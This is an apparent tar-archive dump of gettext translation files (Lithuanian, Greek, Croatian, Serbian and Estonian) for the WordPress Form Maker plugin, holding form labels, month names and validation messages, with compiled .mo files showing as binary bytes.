#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "laukas būtinas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Tai nėra galiojantis elektroninio pašto adresą."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Jūs negalite pasirinkti buvusius datos. Pasirinkite datą, pradedant nuo "
"dabartinio."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "vertė turi būti tarp "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Kiekis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Jūsų rezultatas turi būti mažesnis nei "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Kreipinys"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Pirmas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Paskutinis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Vidurinis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Rajono kodas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefono numeris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolerių"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Centų"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Nuo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Į"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "eiti "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Atstatyti "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Pasirinkite laukas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Pasirinkite datą"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-el.mo000060400000011571152434416630011600 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
P
p
�
�
�
�
�
)�
P�
P<�
�������

*)5_r!����,�"
>
�U
8�
!?ZC��t0��I��s�H4b}=��Q�23E4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:52+0400
PO-Revision-Date: 2015-05-22 16:53+0400
Last-Translator: 
Language-Team: 
Language: el
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
ΑπρίληςΚώδικας περιοχήςΑύγουστοςcents ΠόληΧώραΔεκέμβριοςδολάρια Σφάλμα, e-mail δεν σταλεί.Σφάλμα, το αρχείο δεν μπορεί να μετακινηθεί.Σφάλματος, λανθασμένα τον κωδικό ασφαλείας.ΦεβρουάριοςΠρώτοαπό πηγαίνετεΙανουάριοςΙούλιοςΙούνιοςΤελευταίαΜάρτιοςΜάιοςΜέσονΤίποτα δεν υποβλήθηκε.ΝοέμβριοςΟκτώβριοςΑριθμός τηλεφώνουΤαχυδρομική / Τ.Κ.ποσότητα Επαναφορά vΕπιλέξτε μια ημερομηνίαΕπιλέξτε ένα πεδίοΣεπτέμβριοςΛυπούμαστε, αλλά δεν έχετε δικαίωμα να ανεβάσετε αυτό το είδος του αρχείου.Πολιτεία / Επαρχία / ΠεριφέρειαΟδόςΟδός Διεύθυνση 2ο Το αρχείο υπερβαίνει το επιτρεπόμενο μέγεθος τωνΑυτό το πεδίο %s απαιτεί μια μοναδική εγγραφή και αυτή η τιμή έχει ήδη υποβληθεί.Αυτό δεν είναι μια έγκυρη διεύθυνση ηλεκτρονικού ταχυδρομείου.ΤίτλοςναΣύνδεσμο επιβεβαίωσης δεν είναι έγκυρο.Δεν μπορείτε να επιλέξετε πρώην ημερομηνίες. Επιλέξτε μια ημερομηνία, αρχής γενομένης από την τρέχουσα.Διεύθυνση ηλεκτρονικού ταχυδρομείου σας έχει ήδη επαληθευτεί.Το email σας έχει επαληθευτεί με επιτυχία.Επαλήθευση ηλεκτρονικού ταχυδρομείου σας έχει λήξει.Φόρμα σας υποβλήθηκε με επιτυχία.Ip σας είναι στη μαύρη λίστα. Παρακαλώ επικοινωνήστε με τον διαχειριστή της ιστοσελίδας. Το σκορ σας θα πρέπει να είναι μικρότερη από το πεδίο είναι υποχρεωτικό.τιμή πρέπει να είναι μεταξύ languages/form_maker-hr.mo000060400000007105152434416630011607 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
	I
S
[
b
g
o
x
�
/�
$�
�
�
	
"&.6>T\
es
�����/��!MA ����I�' 
%H
 n
�
D�
&�
'4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:57+0400
PO-Revision-Date: 2015-05-22 16:57+0400
Last-Translator: 
Language-Team: 
Language: hr
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
TravanjArea CodeKolovozCenti GradDržavaProsinacDolara Greška, e-mail nije poslana.Pogreške, datoteka ne može biti premještena.Pogreška, pogrešan sigurnosni kod.VeljačaprijeIz go SiječanjSrpanjLipanjzadOžujakSvibanjSrednjiNišta nije podnesen.StudeniListopadBroj telefonaPoštanski brojkoličina Reset Odaberite datumOdaberite poljeRujanNažalost, ne mogu učitati ovu vrstu datoteke.Država / Pokrajina / regijaUlicaUlica Line 2TheFile prelazi dozvoljenu veličinuOvo polje %s zahtijeva jedinstven unos, a ta vrijednost je već bio podnesen.To nije valjana adresa e-pošte.NaslovNaProvjera veze nije valjana.Ne možete odabrati bivši datume. Odaberite datum počevši od trenutne.Vaša e-mail adresa je već potvrđena.Vaša e-mail je uspješno potvrđena.Vaš e-mail za provjeru istekla.Obrazac uspješno poslan.Vaš IP je na crnoj listi. Obratite se administratoru web stranice. Vaš rezultat bi trebao biti manji od polje je obvezno.vrijednost mora biti između languages/form_maker-sr_RS.mo000060400000010535152434416630012227 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
L
d

q
|
�
�
�
0�
=�
?_nw|�������!��0-^o{��r�09
j
&r
�
C�
t�
7V��8���>`9�@�8|S;�0,4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:04+0400
PO-Revision-Date: 2015-05-22 17:04+0400
Last-Translator: 
Language-Team: 
Language: sr
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
АприлПозивни бројАвгустЦентиГрадДржаваДецембарДолараГрешка, е-маил није послат.Грешка, фајл не може бити померен.Грешка, погрешно Сигурносна аифра.ФебруарПрвиИзиди ЈануарЈулјунаПоследњиМартмајСрединаНишта није поднет.НовембарОктобарБрој телефонаПоштански / Поштански бројКоличинаРесет Изаберите датумИзабрали пољеСептембарЖао нам је, није вам дозвољено да отпремите овог типа датотеке.Држава / покрајина / регионAdresa:Адреса Улица Линија 2TheДатотека прелази дозвољену величинуОво поље %s захтева јединствену вредност улаз и то је већ поднет.Ово није валидна емаил адреса.НасловДаВерификација веза је неважећи.Не можете да изаберете бивше датуме. Изаберите датум почевши од садашњег.Ваша емаил адреса је већ проверен.Ваша емаил је успешно проверен.Ваш верификацију е-маил је истекло.Ваш образац успешно прослеђен.Ваш ИП је на црној листи. Молимо контактирајте администратора сајтаВаша оцена треба да буде мањи од поље је обавезно.Вредност мора бити између languages/form_maker-et.po000060400000056602152434416630011617 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:54+0400\n"
"PO-Revision-Date: 2015-05-22 16:54+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: et\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Tänav"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Tänav Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Linn"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "State / Province / Region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Postiindeks"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Riik"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Jaanuar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Veebruar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Märts"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Aprill"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juuni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juuli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktoober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Detsember"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Viga, vale turvakoodi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Teie IP on mustas nimekirjas. Palun võta ühendust veebilehe haldaja. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Fail ületab lubatud suuruse"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Vabandust, teil ei ole lubatud üles laadida seda tüüpi faili."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Viga, faili ei saa liigutada."

